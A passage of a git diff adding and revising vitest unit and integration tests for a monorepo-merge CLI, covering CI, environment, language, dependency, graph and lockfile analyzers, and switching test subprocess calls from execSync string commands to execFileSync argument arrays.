b/tests/integration/turbo-nx-generation.test.ts index a187519..c6bbc2b 100644 --- a/tests/integration/turbo-nx-generation.test.ts +++ b/tests/integration/turbo-nx-generation.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, beforeEach, afterEach } from 'vitest'; -import { execSync } from 'node:child_process'; +import { execFileSync } from 'node:child_process'; import fs from 'fs-extra'; import path from 'node:path'; import os from 'node:os'; @@ -8,6 +8,12 @@ import crypto from 'node:crypto'; // Retry count for flaky tests (temp directory race conditions) const FLAKY_TEST_RETRIES = 2; +const cliPath = path.join(process.cwd(), 'bin', 'monorepo.js'); + +function runMerge(args: string[]): void { + execFileSync('node', [cliPath, 'merge', ...args], { stdio: 'pipe' }); +} + describe('Turbo/Nx Generation Integration', () => { let tempDir: string; let outputDir: string; @@ -56,10 +62,7 @@ describe('Turbo/Nx Generation Integration', () => { const repo1 = await createTestRepo('pkg-a'); const repo2 = await createTestRepo('pkg-b', { lint: 'eslint .' }); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} ${repo2} -o ${outputDir} --workspace-tool turbo -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, repo2, '-o', outputDir, '--workspace-tool', 'turbo', '-y', '--no-install']); // Verify turbo.json exists and has correct structure const turboPath = path.join(outputDir, 'turbo.json'); @@ -77,10 +80,7 @@ describe('Turbo/Nx Generation Integration', () => { const repo1 = await createTestRepo('pkg-a'); const repo2 = await createTestRepo('pkg-b'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} ${repo2} -o ${outputDir} --workspace-tool nx -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, repo2, '-o', outputDir, '--workspace-tool', 'nx', '-y', '--no-install']); // Verify nx.json exists and has correct structure const nxPath = path.join(outputDir, 'nx.json'); @@ -96,10 +96,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should add turbo as devDependency in root package.json', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool turbo -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'turbo', '-y', '--no-install']); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.devDependencies?.turbo).toBeDefined(); @@ -108,10 +105,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should add nx as devDependency in root package.json', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool nx -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'nx', '-y', '--no-install']); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.devDependencies?.nx).toBeDefined(); @@ -120,10 +114,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should update root scripts to use turbo', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool turbo -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'turbo', '-y', '--no-install']); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.scripts?.build).toContain('turbo'); @@ -133,10 +124,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should update root scripts to use nx', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool nx -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'nx', '-y', '--no-install']); const rootPkg = await fs.readJson(path.join(outputDir, 'package.json')); expect(rootPkg.scripts?.build).toContain('nx'); @@ -146,10 +134,7 @@ describe('Turbo/Nx Generation Integration', () => { it('should not generate config when using --workspace-tool none', { retry: FLAKY_TEST_RETRIES }, async () => { const repo1 = await createTestRepo('pkg-a'); - execSync( - `node ${path.join(process.cwd(), 'bin', 'monorepo.js')} merge ${repo1} -o ${outputDir} --workspace-tool none -y --no-install`, - { stdio: 'pipe' } - ); + runMerge([repo1, '-o', outputDir, '--workspace-tool', 'none', '-y', '--no-install']); expect(await fs.pathExists(path.join(outputDir, 'turbo.json'))).toBe(false); expect(await fs.pathExists(path.join(outputDir, 'nx.json'))).toBe(false); diff --git a/tests/tsconfig.json b/tests/tsconfig.json new file mode 100644 index 0000000..813c385 --- /dev/null +++ b/tests/tsconfig.json @@ -0,0 +1,11 @@ +{ + "extends": "../tsconfig.json", + "compilerOptions": { + "rootDir": "..", + "outDir": "../dist-tests", + "noEmit": true, + "noUnusedLocals": false, + "noUnusedParameters": false + }, + "include": ["**/*.ts", "../src/**/*.ts"] +} diff --git a/tests/unit/analyzers/ci.test.ts b/tests/unit/analyzers/ci.test.ts new file mode 100755 index 0000000..63c3faf --- /dev/null +++ b/tests/unit/analyzers/ci.test.ts @@ -0,0 +1,195 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeCI } from '../../../src/analyzers/ci.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzeCI', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect multiple CI systems', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-gh', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-circle', + packageJson: { name: 'b', version: '1.0.0' }, + directories: ['.circleci'], + files: { '.circleci/config.yml': 'version: 2.1' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-gh' }, { path: repoBPath, name: 'repo-circle' }], + logger, + ); + + const multiCI = findings.find((f) => f.id === 'ci-multiple-systems'); + expect(multiCI).toBeDefined(); + expect(multiCI!.severity).toBe('warn'); + }); + + it('should detect repos without CI', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-with-ci', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-no-ci', + packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-with-ci' }, { path: repoBPath, name: 'repo-no-ci' }], + logger, + ); + + const missing = findings.find((f) => f.id === 'ci-missing'); + expect(missing).toBeDefined(); + }); + + it('should return empty findings for single repo with no CI', async () => { + const repoPath = await createTempFixture({ + name: 'no-ci-single', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const findings = await analyzeCI([{ path: repoPath, name: 'no-ci-single' }], logger); + expect(findings).toEqual([]); + }); + + it('should not report missing CI when no repos have CI', async () => { + const repoAPath = await createTempFixture({ + name: 'no-ci-a', + packageJson: { name: 'a', version: '1.0.0' }, + }); + const repoBPath = await createTempFixture({ + name: 'no-ci-b', + packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'no-ci-a' }, { path: repoBPath, name: 'no-ci-b' }], + logger, + ); + expect(findings.some((f) => f.id === 'ci-missing')).toBe(false); + }); + + it('should detect workflow name conflicts in GitHub Actions', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-wf-a', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-wf-b', + packageJson: { name: 'b', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-wf-a' }, { path: repoBPath, name: 'repo-wf-b' }], + logger, + ); + + const conflict = findings.find((f) => f.id.startsWith('ci-workflow-conflict')); + expect(conflict).toBeDefined(); + expect(conflict!.title).toContain('ci.yml'); + expect(conflict!.severity).toBe('warn'); + }); + + it('should not flag workflow conflicts when names differ', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-diff-wf-a', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/build.yml': 'name: Build' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-diff-wf-b', + packageJson: { name: 'b', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/test.yml': 'name: Test' }, + }); + + const findings = await analyzeCI( + [{ path: repoAPath, name: 'repo-diff-wf-a' }, { path: repoBPath, name: 'repo-diff-wf-b' }], + logger, + ); + const conflicts = findings.filter((f) => f.id.startsWith('ci-workflow-conflict')); + expect(conflicts).toHaveLength(0); + }); + + it('should detect Travis CI and Jenkins', async () => { + const travisPath = await createTempFixture({ + name: 'repo-travis', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.travis.yml': 'language: node_js' }, + }); + const jenkinsPath = await createTempFixture({ + name: 'repo-jenkins', + packageJson: { name: 'b', version: '1.0.0' }, + files: { 'Jenkinsfile': 'pipeline {}' }, + }); + + const findings = await analyzeCI( + [{ path: travisPath, name: 'repo-travis' }, { path: jenkinsPath, name: 'repo-jenkins' }], + logger, + ); + const multi = findings.find((f) => f.id === 'ci-multiple-systems'); + expect(multi).toBeDefined(); + const systems = multi!.evidence.map((e) => e.snippet); + expect(systems.some((s) => s.includes('Travis CI'))).toBe(true); + expect(systems.some((s) => s.includes('Jenkins'))).toBe(true); + }); + + it('should detect GitLab CI', async () => { + const gitlabPath = await createTempFixture({ + name: 'repo-gitlab', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.gitlab-ci.yml': 'stages:\n - build' }, + }); + const ghPath = await createTempFixture({ + name: 'repo-gh-2', + packageJson: { name: 'b', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + + const findings = await analyzeCI( + [{ path: gitlabPath, name: 'repo-gitlab' }, { path: ghPath, name: 'repo-gh-2' }], + logger, + ); + expect(findings.some((f) => f.id === 'ci-multiple-systems')).toBe(true); + }); + + it('should report ci-missing with correct severity and evidence', async () => { + const ciPath = await createTempFixture({ + name: 'repo-has-ci', + packageJson: { name: 'a', version: '1.0.0' }, + directories: ['.github/workflows'], + files: { '.github/workflows/ci.yml': 'name: CI' }, + }); + const noCiPath = await createTempFixture({ + name: 'repo-lacks-ci', + packageJson: { name: 'b', version: '1.0.0' }, + }); + + const findings = await analyzeCI( + [{ path: ciPath, name: 'repo-has-ci' }, { path: noCiPath, name: 'repo-lacks-ci' }], + logger, + ); + const missing = findings.find((f) => f.id === 'ci-missing')!; + expect(missing.severity).toBe('info'); + expect(missing.evidence.some((e) => e.path === 'repo-lacks-ci')).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/dependencies.edge-cases.test.ts b/tests/unit/analyzers/dependencies.edge-cases.test.ts index a5def0a..e8152d6 100644 --- a/tests/unit/analyzers/dependencies.edge-cases.test.ts +++ b/tests/unit/analyzers/dependencies.edge-cases.test.ts @@ -47,21 +47,20 @@ describe('Dependency Analysis Edge Cases', () => { describe('range versions', () => { it('should handle >=x.y.z { const versions = ['>=1.0.0 <2.0.0', '^1.5.0', '1.9.0']; - // Range versions can't be parsed as simple semver const highest = getHighestVersion(versions); - expect(highest).toBeDefined(); + expect(highest).toBe('1.9.0'); }); it('should handle hyphen ranges (1.0.0 - 2.0.0)', () => { const versions = ['1.0.0 - 2.0.0', '1.5.0']; const highest = getHighestVersion(versions); - expect(highest).toBeDefined(); + expect(highest).toBe('1.5.0'); }); it('should handle or ranges (||)', () => { - const versions = ['^1.0.0 || ^2.0.0', '1.5.0']; + const versions = ['^1.0.0 || ^2.0.0', '^2.5.0']; const highest = getHighestVersion(versions); - expect(highest).toBeDefined(); + expect(highest).toBe('^2.5.0'); }); }); @@ -193,6 +192,7 @@ describe('Dependency Analysis Edge Cases', () => { // Should gracefully handle malformed JSON expect(result.packages).toHaveLength(0); + expect(result.warnings?.some((w) => w.type === 'parse-error' && w.source === 'malformed')).toBe(true); }); it('should handle wildcard dependencies', async () => { @@ -354,6 +354,99 @@ describe('Dependency Analysis Edge Cases', () => { }); }); + describe('peer conflict and devDependencies paths', () => { + it('should generate decisions for peer dependency violations', async () => { + // Repo with a peerDependency on react >=18 but another repo only has react 17 + const fixture1 = await createTempFixture({ + name: 'peer-host', + packageJson: { + name: 'peer-host', + version: '1.0.0', + dependencies: { react: '^17.0.0' }, + }, + }); + const fixture2 = await createTempFixture({ + name: 'peer-consumer', + packageJson: { + name: 'peer-consumer', + version: '1.0.0', + peerDependencies: { react: '>=18.0.0' }, + }, + }); + + const result = await analyzeDependencies([ + { path: fixture1, name: 'peer-host' }, + { path: fixture2, name: 'peer-consumer' }, + ]); + + // Should have a peer-constraint-violation decision + const peerDecision = result.findings?.decisions.find( + (d) => d.kind === 'peer-constraint-violation', + ); + expect(peerDecision).toBeDefined(); + expect(peerDecision!.description).toContain('react'); + }); + + it('should deduplicate peer conflict with declared conflict of same name', async () => { + // Two repos with different react versions (declared conflict) + peer constraint violation + const fixture1 = await createTempFixture({ + name: 'repo-react-17', + packageJson: { + name: 'repo-react-17', + version: '1.0.0', + dependencies: { react: '^17.0.0' }, + }, + }); + const fixture2 = await createTempFixture({ + name: 'repo-react-18', + packageJson: { + name: 'repo-react-18', + version: '1.0.0', + dependencies: { react: '^18.0.0' }, + peerDependencies: { react: '>=18.0.0' }, + }, + }); + + const result = await analyzeDependencies([ + { path: fixture1, name: 'repo-react-17' }, + { path: fixture2, name: 'repo-react-18' }, + ]); + + // Should have both declared and peer conflicts (deduplicated with __peer suffix) + const reactConflicts = result.conflicts.filter((c) => c.name.startsWith('react')); + expect(reactConflicts.length).toBeGreaterThanOrEqual(1); + }); + + it('should resolve devDependencies-only packages to resolvedDevDependencies', async () => { + // One repo with a devDependency, another with same devDependency (no deps version) + const fixture1 = await createTempFixture({ + name: 'dev-repo-1', + packageJson: { + name: 'dev-repo-1', + version: '1.0.0', + devDependencies: { vitest: '^1.0.0' }, + }, + }); + const fixture2 = await createTempFixture({ + name: 'dev-repo-2', + packageJson: { + name: 'dev-repo-2', + version: '1.0.0', + devDependencies: { vitest: '^1.5.0' }, + }, + }); + + const result = await analyzeDependencies([ + { path: fixture1, name: 'dev-repo-1' }, + { path: fixture2, name: 'dev-repo-2' }, + ]); + + // vitest should appear only in resolvedDevDependencies (not in resolvedDependencies) + expect(result.resolvedDevDependencies['vitest']).toBeDefined(); + expect(result.resolvedDependencies['vitest']).toBeUndefined(); + }); + }); + describe('getLowestVersion', () => { it('should return lowest semver version', () => { expect(getLowestVersion(['1.0.0', '2.0.0', '3.0.0'])).toBe('1.0.0'); diff --git a/tests/unit/analyzers/environment.test.ts b/tests/unit/analyzers/environment.test.ts new file mode 100755 index 0000000..184fa7d --- /dev/null +++ b/tests/unit/analyzers/environment.test.ts @@ -0,0 +1,143 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { analyzeEnvironment } from '../../../src/analyzers/environment.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; + +describe('analyzeEnvironment', () => { + const logger = createMockLogger(); + + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect Node.js version mismatch', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.nvmrc': '18' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { '.nvmrc': '20' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-a' }, { path: repoBPath, name: 'repo-b' }], + logger, + ); + + const mismatch = findings.find((f) => f.id === 'env-node-mismatch'); + expect(mismatch).toBeDefined(); + expect(mismatch!.severity).toBe('warn'); + }); + + it('should flag repos without version files', async () => { + const repoPath = await createTempFixture({ + name: 'repo-no-version', + packageJson: { name: 'test', version: '1.0.0' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoPath, name: 'repo-no-version' }], + logger, + ); + + const noVersion = findings.find((f) => f.id.startsWith('env-no-node-version')); + expect(noVersion).toBeDefined(); + }); + + it('should detect .node-version file', async () => { + const repoPath = await createTempFixture({ + name: 'repo-node-version', + packageJson: { name: 'test', version: '1.0.0' }, + files: { '.node-version': '20.11.0' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoPath, name: 'repo-node-version' }], + logger, + ); + + // Should not flag as missing version file + expect(findings.find((f) => f.id.startsWith('env-no-node-version'))).toBeUndefined(); + }); + + it('should detect engines.node in package.json', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-engines-a', + packageJson: { name: 'a', version: '1.0.0', engines: { node: '>=18' } }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-engines-b', + packageJson: { name: 'b', version: '1.0.0', engines: { node: '>=20' } }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-engines-a' }, { path: repoBPath, name: 'repo-engines-b' }], + logger, + ); + + const mismatch = findings.find((f) => f.id === 'env-node-mismatch'); + expect(mismatch).toBeDefined(); + }); + + it('should handle malformed package.json gracefully', async () => { + const repoPath = await createTempFixture({ + name: 'repo-malformed-env', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoPath, name: 'repo-malformed-env' }], + logger, + ); + + const malformed = findings.find((f) => f.id === 'env-malformed-package-json-repo-malformed-env'); + expect(malformed).toBeDefined(); + expect(malformed?.severity).toBe('warn'); + }); + + it('should detect mismatch between .node-version and .nvmrc across repos', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-nodeversion', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.node-version': '18.17.0' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-nvmrc', + packageJson: { name: 'b', version: '1.0.0' }, + files: { '.nvmrc': '20.10.0' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-nodeversion' }, { path: repoBPath, name: 'repo-nvmrc' }], + logger, + ); + + const mismatch = findings.find((f) => f.id === 'env-node-mismatch'); + expect(mismatch).toBeDefined(); + }); + + it('should return no mismatch when all versions match', async () => { + const repoAPath = await createTempFixture({ + name: 'repo-a', + packageJson: { name: 'a', version: '1.0.0' }, + files: { '.nvmrc': '20' }, + }); + const repoBPath = await createTempFixture({ + name: 'repo-b', + packageJson: { name: 'b', version: '1.0.0' }, + files: { '.nvmrc': '20' }, + }); + + const findings = await analyzeEnvironment( + [{ path: repoAPath, name: 'repo-a' }, { path: repoBPath, name: 'repo-b' }], + logger, + ); + + expect(findings.find((f) => f.id === 'env-node-mismatch')).toBeUndefined(); + }); +}); diff --git a/tests/unit/analyzers/files.test.ts b/tests/unit/analyzers/files.test.ts index 789a010..603fb5c 100644 --- a/tests/unit/analyzers/files.test.ts +++ b/tests/unit/analyzers/files.test.ts @@ -194,8 +194,8 @@ describe('File Collision Analysis', () => { const result = getFilePaths('config.json', repos, ['repo1', 'repo2']); expect(result).toHaveLength(2); - expect(result[0]).toBe('/path/to/repo1/config.json'); - expect(result[1]).toBe('/path/to/repo2/config.json'); + expect(result[0]).toBe(path.join('/path/to/repo1', 'config.json')); + expect(result[1]).toBe(path.join('/path/to/repo2', 'config.json')); }); it('should filter out non-existent repos', () => { @@ -206,7 +206,7 @@ describe('File Collision Analysis', () => { const result = getFilePaths('config.json', repos, ['repo1', 'nonexistent']); expect(result).toHaveLength(1); - expect(result[0]).toBe('/path/to/repo1/config.json'); + expect(result[0]).toBe(path.join('/path/to/repo1', 'config.json')); }); }); diff --git a/tests/unit/analyzers/graph.test.ts b/tests/unit/analyzers/graph.test.ts index 0a80926..ab47f95 100755 --- a/tests/unit/analyzers/graph.test.ts +++ b/tests/unit/analyzers/graph.test.ts @@ -72,6 +72,22 @@ describe('detectCircularDependencies', () => { const cycles = detectCircularDependencies([]); expect(cycles).toEqual([]); }); + + it('should deduplicate equivalent cycles via canonicalization', () => { + // Cycle: Z→A→M→Z - canonicalization ensures same cycle detected only once + const crossDeps: CrossDependency[] = [ + { fromPackage: 'Z', toPackage: 'A', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + { fromPackage: 'A', toPackage: 'M', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + { fromPackage: 'M', toPackage: 'Z', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + ]; + + const cycles = detectCircularDependencies(crossDeps); + expect(cycles).toHaveLength(1); + // All nodes should be present in the cycle + expect(cycles[0].cycle).toContain('Z'); + expect(cycles[0].cycle).toContain('A'); + expect(cycles[0].cycle).toContain('M'); + }); }); describe('computeHotspots', () => { diff --git a/tests/unit/analyzers/languages.test.ts b/tests/unit/analyzers/languages.test.ts new file mode 100755 index 0000000..4ea5f34 --- /dev/null +++ b/tests/unit/analyzers/languages.test.ts @@ -0,0 +1,208 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { detectLanguages } from '../../../src/analyzers/languages.js'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; + +describe('detectLanguages', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + it('should detect Go via go.mod', async () => { + const repoPath = await createTempFixture({ + name: 'go-repo', + files: { + 'go.mod': 'module github.com/example/mymod\n\ngo 1.21\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'go-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].repoName).toBe('go-repo'); + expect(result[0].languages).toHaveLength(1); + expect(result[0].languages[0].name).toBe('go'); + expect(result[0].languages[0].markers).toContain('go.mod'); + expect(result[0].languages[0].metadata?.module).toBe('github.com/example/mymod'); + }); + + it('should detect Rust via Cargo.toml', async () => { + const repoPath = await createTempFixture({ + name: 'rust-repo', + files: { + 'Cargo.toml': '[package]\nname = "my-crate"\nversion = "0.1.0"\nedition = "2021"\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'rust-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].repoName).toBe('rust-repo'); + expect(result[0].languages).toHaveLength(1); + expect(result[0].languages[0].name).toBe('rust'); + expect(result[0].languages[0].markers).toContain('Cargo.toml'); + expect(result[0].languages[0].metadata?.crate).toBe('my-crate'); + }); + + it('should detect Python via pyproject.toml', async () => { + const repoPath = await createTempFixture({ + name: 'py-repo', + files: { + 'pyproject.toml': '[project]\nname = "my-python-pkg"\nversion = "1.0.0"\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'py-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].repoName).toBe('py-repo'); + expect(result[0].languages).toHaveLength(1); + expect(result[0].languages[0].name).toBe('python'); + expect(result[0].languages[0].markers).toContain('pyproject.toml'); + }); + + it('should detect Python via requirements.txt when pyproject.toml is absent', async () => { + const repoPath = await createTempFixture({ + name: 'py-req-repo', + files: { + 'requirements.txt': 'flask==2.3.0\nrequests>=2.28.0\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'py-req-repo' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages[0].name).toBe('python'); + expect(result[0].languages[0].markers).toContain('requirements.txt'); + }); + + it('should prefer pyproject.toml over requirements.txt', async () => { + const repoPath = await createTempFixture({ + name: 'py-both', + files: { + 'pyproject.toml': '[project]\nname = "dual"\n', + 'requirements.txt': 'flask==2.3.0\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'py-both' }]); + + expect(result).toHaveLength(1); + // Should only detect one Python entry, from pyproject.toml + const pyLangs = result[0].languages.filter((l) => l.name === 'python'); + expect(pyLangs).toHaveLength(1); + expect(pyLangs[0].markers).toContain('pyproject.toml'); + }); + + it('should return empty array for JS-only repos', async () => { + const repoPath = await createTempFixture({ + name: 'js-only', + packageJson: { name: 'js-only', version: '1.0.0' }, + files: { + 'src/index.ts': 'export const x = 1;\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'js-only' }]); + + expect(result).toHaveLength(0); + }); + + it('should detect multiple languages in one repo', async () => { + const repoPath = await createTempFixture({ + name: 'multi-lang', + files: { + 'go.mod': 'module github.com/example/multi\n\ngo 1.21\n', + 'Cargo.toml': '[package]\nname = "multi"\nversion = "0.1.0"\n', + 'pyproject.toml': '[project]\nname = "multi"\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'multi-lang' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages).toHaveLength(3); + + const langNames = result[0].languages.map((l) => l.name); + expect(langNames).toContain('go'); + expect(langNames).toContain('rust'); + expect(langNames).toContain('python'); + }); + + it('should detect languages across multiple repos', async () => { + const goRepo = await createTempFixture({ + name: 'go-svc', + files: { 'go.mod': 'module github.com/example/svc\n\ngo 1.21\n' }, + }); + const rustRepo = await createTempFixture({ + name: 'rust-lib', + files: { 'Cargo.toml': '[package]\nname = "rust-lib"\nversion = "0.1.0"\n' }, + }); + const jsRepo = await createTempFixture({ + name: 'js-app', + packageJson: { name: 'js-app', version: '1.0.0' }, + }); + + const result = await detectLanguages([ + { path: goRepo, name: 'go-svc' }, + { path: rustRepo, name: 'rust-lib' }, + { path: jsRepo, name: 'js-app' }, + ]); + + // JS-only repo should not appear + expect(result).toHaveLength(2); + expect(result.find((d) => d.repoName === 'go-svc')).toBeDefined(); + expect(result.find((d) => d.repoName === 'rust-lib')).toBeDefined(); + expect(result.find((d) => d.repoName === 'js-app')).toBeUndefined(); + }); + + it('should handle go.mod without module line', async () => { + const repoPath = await createTempFixture({ + name: 'go-no-module', + files: { + 'go.mod': 'go 1.21\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'go-no-module' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages[0].name).toBe('go'); + expect(result[0].languages[0].metadata).toBeUndefined(); + }); + + it('should handle Cargo.toml without package name', async () => { + const repoPath = await createTempFixture({ + name: 'rust-no-name', + files: { + 'Cargo.toml': '[workspace]\nmembers = ["crates/*"]\n', + }, + }); + + const result = await detectLanguages([{ path: repoPath, name: 'rust-no-name' }]); + + expect(result).toHaveLength(1); + expect(result[0].languages[0].name).toBe('rust'); + expect(result[0].languages[0].metadata).toBeUndefined(); + }); + + it('should call logger when provided', async () => { + const repoPath = await createTempFixture({ + name: 'log-test', + files: { 'go.mod': 'module test\n\ngo 1.21\n' }, + }); + + const logs: string[] = []; + const logger = { + info: (msg: string) => logs.push(msg), + success: () => {}, + warn: () => {}, + error: () => {}, + debug: () => {}, + log: () => {}, + }; + + await detectLanguages([{ path: repoPath, name: 'log-test' }], logger); + + expect(logs.some((l) => l.includes('1 non-JS language'))).toBe(true); + }); +}); diff --git a/tests/unit/analyzers/lockfile.test.ts b/tests/unit/analyzers/lockfile.test.ts index a75a04b..1a9276a 100755 --- a/tests/unit/analyzers/lockfile.test.ts +++ b/tests/unit/analyzers/lockfile.test.ts @@ -60,6 +60,21 @@ packages: expect(result['typescript']).toBe('5.3.3'); }); + it('should parse flat format with object-style dependency values', () => { + const content = `lockfileVersion: 5 + +dependencies: + lodash: + version: 4.17.21 + resolved: https://registry.npmjs.org/lodash + react: 18.2.0 +`; + + const result = parsePnpmLock(content); + expect(result['lodash']).toBe('4.17.21'); + expect(result['react']).toBe('18.2.0'); + }); + it('should return empty object for malformed content', () => { const result = parsePnpmLock('this is not valid yaml at all {}[]'); expect(result).toEqual({}); @@ -69,6 +84,24 @@ packages: const result = parsePnpmLock(''); expect(result).toEqual({}); }); + + it('should fall back to parsing versions from packages keys', () => { + const content = `lockfileVersion: '9.0' + +importers: + .: {} + +packages: + '@types/node@20.19.0': + resolution: {integrity: sha512-abc} + '/lodash/4.17.21': + resolution: {integrity: sha512-def} +`; + + const result = parsePnpmLock(content); + expect(result['@types/node']).toBe('20.19.0'); + expect(result['lodash']).toBe('4.17.21'); + }); }); describe('parseYarnLock', () => { @@ -124,6 +157,17 @@ react@^18.2.0: const result = parseYarnLock('not a valid lockfile'); expect(result).toEqual({}); }); + + it('should parse multi-selector entries and keep highest resolved version', () => { + const content = `# yarn lockfile v1 + +"react@^18.0.0", "react@^18.2.0": + version "18.2.0" +`; + + const result = parseYarnLock(content); + expect(result['react']).toBe('18.2.0'); + }); }); describe('parsePackageLock', () => { @@ -183,6 +227,39 @@ describe('parsePackageLock', () => { const result = parsePackageLock(JSON.stringify({ lockfileVersion: 3, packages: {} })); expect(result).toEqual({}); }); + + it('should parse v1 format with dependencies key (no packages)', () => { + const lockData = { + name: 'my-app', + version: '1.0.0', + lockfileVersion: 1, + dependencies: { + lodash: { version: '4.17.21', resolved: 'https://...' }, + react: { version: '18.2.0', resolved: 'https://...' }, + }, + }; + + const result = parsePackageLock(JSON.stringify(lockData)); + expect(result['lodash']).toBe('4.17.21'); + expect(result['react']).toBe('18.2.0'); + }); + + it('should use v1 fallback when packages key has only root entry', () => { + const lockData = { + lockfileVersion: 2, + packages: { + '': { name: 'my-app', version: '1.0.0' }, + }, + dependencies: { + lodash: { version: '4.17.21' }, + express: { version: '4.18.2' }, + }, + }; + + const result = parsePackageLock(JSON.stringify(lockData)); + expect(result['lodash']).toBe('4.17.21'); + expect(result['express']).toBe('4.18.2'); + }); }); describe('parseLockfile', () => { @@ -254,4 +331,16 @@ express@^4.18.0: const result = await parseLockfile(testDir, 